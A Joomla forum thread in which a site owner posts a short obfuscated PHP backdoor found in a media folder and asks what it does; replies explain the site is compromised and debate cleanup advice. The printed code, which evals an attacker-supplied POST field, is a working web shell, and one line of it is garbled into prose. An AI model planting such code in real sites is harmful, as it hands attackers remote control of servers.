Backdoor:PHP/Small.M found, but what can it do ?

[namviet]

Hi everyone,

I found a strange php script in my Joomla site (Windows Defender named it Backdoor:PHP/Small.M), probably be leaving there by an attacker. However the code unclear to me what can it do. Could you advice me what is the purpose of the attacker ? They created a file name "search.php" and placed in a Joomla media folder, the content in the file is:

Code: Select all

<?php
    $gll9= "o_pst" ; 
    $pxi6=strtoupper( $gll9[1]ich means to set $pxi6 = "_POST"
    if (isset( ${ $pxi6 } [ 'qe0080b'])) 
        {eval(${ $pxi6}[ 'qe0080b']); }
?> 

Thank you,
nv
PS. happy to be back here after so long time!

[Webdongle]

It means that you have been hacked. Most likely the original hacker has announced the backdoor to others. You will almost certainly have many hack files. Is your site on localhost or remote server?

viewtopic.php?f=714&t=946026

[namviet]

It means that you have been hacked. Most likely the original hacker has announced the backdoor to others. You will almost certainly have many hack files. Is your site on localhost or remote server?

viewtopic.php?f=714&t=946026

hi Webdongle, yes, seeing this strange file means the site has been compromised (hosted in VPS).
What I wonder is, what can they do with this peace of "backdoor" code on my server ?
Is it just a part of the backdoor, and the file to be included in other backdoor php files elsewhere on server, to be meaningful ?

Cheers,
nv

[Webdongle]

Anything they want.

Once a hacker has uploaded a file to your site then they are able to upload files that can
Use your server as a relay
Access your database
Steal your passwords
Add other files
Download viruses to visiting computers
And allow hackers as much access to your server as you have.

[Jim007]

i google searched that code and it went to a company, which i am sure is hacked also

[ redacted ] and looking at qe0080b brings up some russian language looking stuff

[Jim007]

I also want to say that every post in security that says viewtopic.php?f=714&t=946026 is ridiculous. I would like to know more answers than ... here read the topic. or at least make it better to read, get a little reach around first with grap a bottle of jack and a can of coke.... just saying

[abernyte]

Most users who come here, having had a site hacked, are genuinely looking for help and advice on what to do.
The advice in viewtopic.php?f=714&t=946026 is a summary of viewtopic.php?f=714&t=757645 and will get users up and running again with a clean site. In this context, understanding what the hack does is irrelevant and the time wasted diving down that rabbit hole is time better spent cleaning and rebuilding a site. But you already know that as you have received help and advice on these boards for many years.

[Jim007]

Most users who come here, having had a site hacked, are genuinely looking for help and advice on what to do.
The advice in viewtopic.php?f=714&t=946026 is a summary of viewtopic.php?f=714&t=757645 and will get users up and running again with a clean site. In this context, understanding what the hack does is irrelevant and the time wasted diving down that rabbit hole is time better spent cleaning and rebuilding a site. But you already know that as you have received help and advice on these boards for many years.

True

[Webdongle]

Then why criticise the advice?

[Jim007]

Because it is the same advice without actually hitting the root of the problem.

[Webdongle]

It eradicates the problem. The root of the problem is bad practice by the site admin and that can only be eradicated by themselves.

There have been many people like yourself who fail to understand the importance of the advice. Those are the users who keep getting hacked.